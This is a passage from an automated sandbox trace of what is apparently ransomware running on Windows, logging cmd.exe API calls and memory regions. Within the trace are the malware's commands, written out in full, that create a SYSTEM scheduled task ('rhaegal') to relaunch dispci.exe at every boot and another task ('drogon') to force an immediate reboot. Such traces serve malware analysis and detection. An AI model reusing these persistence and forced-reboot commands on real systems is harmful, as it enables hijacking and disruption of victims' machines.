(_String1="schtasks", _String2="DATE") returned 15 [0017.526] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0017.526] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0017.526] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0017.526] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0017.526] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0017.526] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0017.526] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0017.526] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0017.526] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0017.526] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0017.526] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0017.527] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0017.527] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0017.527] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0017.527] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0017.527] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0017.527] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0017.527] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0017.527] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0017.527] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0017.527] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0017.527] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0017.527] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0017.527] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0017.527] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0017.527] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0017.527] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0017.527] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0017.527] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0017.527] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0017.527] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0017.527] SetErrorMode (uMode=0x0) returned 0x8001 [0017.527] SetErrorMode (uMode=0x1) returned 0x0 [0017.527] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3941f8, lpFilePart=0x32ee40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32ee40*="Desktop") returned 0x25 [0017.527] SetErrorMode (uMode=0x8001) returned 0x1 [0017.527] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0017.527] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0017.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0017.531] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0017.531] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x32ebbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebbc) returned 0xffffffff [0017.531] GetLastError () returned 0x2 [0017.531] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks", fInfoLevelId=0x1, lpFindFileData=0x32ebbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebbc) returned 0xffffffff [0017.531] GetLastError () returned 0x2 [0017.531] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0017.531] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x32ebbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebbc) returned 0x3935d8 [0017.532] FindClose (in: hFindFile=0x3935d8 | out: hFindFile=0x3935d8) returned 1 [0017.532] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x32ebbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebbc) returned 0xffffffff [0017.532] GetLastError () returned 0x2 [0017.532] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ebbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebbc) returned 0x3935d8 [0017.532] FindClose (in: hFindFile=0x3935d8 | out: hFindFile=0x3935d8) returned 1 [0017.532] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0017.532] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0017.532] GetConsoleTitleW (in: lpConsoleTitle=0x32f0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.532] InitializeProcThreadAttributeList (in: lpAttributeList=0x32ef3c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32f004 | out: lpAttributeList=0x32ef3c, lpSize=0x32f004) returned 1 [0017.532] UpdateProcThreadAttribute (in: lpAttributeList=0x32ef3c, dwFlags=0x0, Attribute=0x60001, lpValue=0x32effc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32ef3c, lpPreviousValue=0x0) returned 1 [0017.532] GetStartupInfoW (in: lpStartupInfo=0x32eef8 | out: lpStartupInfo=0x32eef8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0017.532] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0017.533] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0017.533] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0017.534] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x32ef98*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32efe4 | out: lpCommandLine="schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"", lpProcessInformation=0x32efe4*(hProcess=0x78, hThread=0x74, dwProcessId=0x9b8, dwThreadId=0x9bc)) returned 1 [0017.537] CloseHandle (hObject=0x74) returned 1 [0017.537] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0017.537] GetEnvironmentStringsW () returned 0x394500* [0017.538] FreeEnvironmentStringsW (penv=0x394500) returned 1 [0017.538] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0018.881] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x32eed8 | out: lpExitCode=0x32eed8*=0x0) returned 1 [0018.881] CloseHandle (hObject=0x78) returned 1 [0018.881] _vsnwprintf (in: _Buffer=0x32f020, _BufferCount=0x13, _Format="%08X", _ArgList=0x32eee4 | out: _Buffer="00000000") returned 8 [0018.881] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0018.881] GetEnvironmentStringsW () returned 0x394500* [0018.881] FreeEnvironmentStringsW (penv=0x394500) returned 1 [0018.881] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0018.881] GetEnvironmentStringsW () returned 0x394500* [0018.881] FreeEnvironmentStringsW (penv=0x394500) returned 1 [0018.881] DeleteProcThreadAttributeList (in: lpAttributeList=0x32ef3c | out: lpAttributeList=0x32ef3c) [0018.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0018.881] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0018.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0018.881] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5b41ac | out: lpMode=0x4a5b41ac) returned 1 [0018.882] _get_osfhandle (_FileHandle=0) returned 0x3 [0018.882] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5b41b0 | out: lpMode=0x4a5b41b0) returned 1 [0018.882] SetConsoleInputExeNameW () returned 0x1 [0018.882] GetConsoleOutputCP () returned 0x1b5 [0018.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1 [0018.882] SetThreadUILanguage (LangId=0x0) returned 0x409 [0018.882] exit (_Code=0) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6165b000" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x960" cmd_line = "/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 581 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 582 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 583 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 584 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 585 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 586 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 587 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 588 start_va = 0x4a590000 end_va = 0x4a5dbfff entry_point = 0x4a59829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 589 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 590 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 591 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 592 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 593 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 594 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 595 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 596 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 597 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 598 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 599 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 600 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744ef798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 601 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x7453de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 691 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 692 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 693 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 694 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 695 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 696 start_va = 0x74810000 end_va = 0x74816fff entry_point = 0x74811230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 697 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 698 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74aea3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 699 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74cbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 700 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 701 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e84975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 702 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74eb49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 703 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ef0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 704 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x76406343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 705 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76543fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 706 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 707 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x766132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 708 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 709 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 710 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 711 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 712 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 713 start_va = 0x540000 end_va = 0x6c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 714 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b4158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 715 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 716 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 717 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 718 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 719 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 720 start_va = 0x6d0000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 721 start_va = 0x860000 end_va = 0x1c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 722 start_va = 0x1c60000 end_va = 0x1fa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c60000" filename = "" Region: id = 725 start_va = 0x1fb0000 end_va = 0x227efff entry_point = 0x1fb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 9 os_tid = 0x9b4 [0017.938] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ff8bc | out: lpSystemTimeAsFileTime=0x3ff8bc*(dwLowDateTime=0x43f10a90, dwHighDateTime=0x1d34da4)) [0017.938] GetCurrentProcessId () returned 0x9b0 [0017.938] GetCurrentThreadId () returned 0x9b4 [0017.938] GetTickCount () returned 0x1428b [0017.938] QueryPerformanceCounter (in: lpPerformanceCount=0x3ff8b4 | out: lpPerformanceCount=0x3ff8b4*=316964085) returned 1 [0017.939] GetModuleHandleA (lpModuleName=0x0) returned 0x4a590000 [0017.939] __set_app_type (_Type=0x1) [0017.939] __p__fmode () returned 0x76ae31f4 [0017.939] __p__commode () returned 0x76ae31fc [0017.940] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5b21a6) returned 0x0 [0017.940] __getmainargs (in: _Argc=0x4a5b4238, _Argv=0x4a5b4240, _Env=0x4a5b423c, _DoWildCard=0, _StartInfo=0x4a5b4140 | out: _Argc=0x4a5b4238, _Argv=0x4a5b4240, _Env=0x4a5b423c) returned 0 [0017.940] GetCurrentThreadId () returned 0x9b4 [0017.940] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b4) returned 0x60 [0017.940] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0017.940] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadUILanguage") returned 0x7662a84f [0017.940] SetThreadUILanguage (LangId=0x0) returned 0x409 [0017.940] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0017.940] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ff84c | out: phkResult=0x3ff84c*=0x0) returned 0x2 [0017.940] VirtualQuery (in: lpAddress=0x3ff883, lpBuffer=0x3ff81c, dwLength=0x1c | out: lpBuffer=0x3ff81c*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0017.940] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ff81c, dwLength=0x1c | out: lpBuffer=0x3ff81c*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0017.940] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ff81c, dwLength=0x1c | out: lpBuffer=0x3ff81c*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0017.940] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ff81c, dwLength=0x1c | out: lpBuffer=0x3ff81c*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0017.940] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ff81c, dwLength=0x1c | out: lpBuffer=0x3ff81c*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0017.940] GetConsoleOutputCP () returned 0x1b5 [0017.941] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1 [0017.941] SetConsoleCtrlHandler (HandlerRoutine=0x4a5ae72a, Add=1) returned 1 [0017.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.941] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0017.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.941] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5b41ac | out: lpMode=0x4a5b41ac) returned 1 [0017.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.941] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0017.941] _get_osfhandle (_FileHandle=0) returned 0x3 [0017.941] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5b41b0 | out: lpMode=0x4a5b41b0) returned 1 [0017.941] _get_osfhandle (_FileHandle=0) returned 0x3 [0017.941] SetConsoleMode 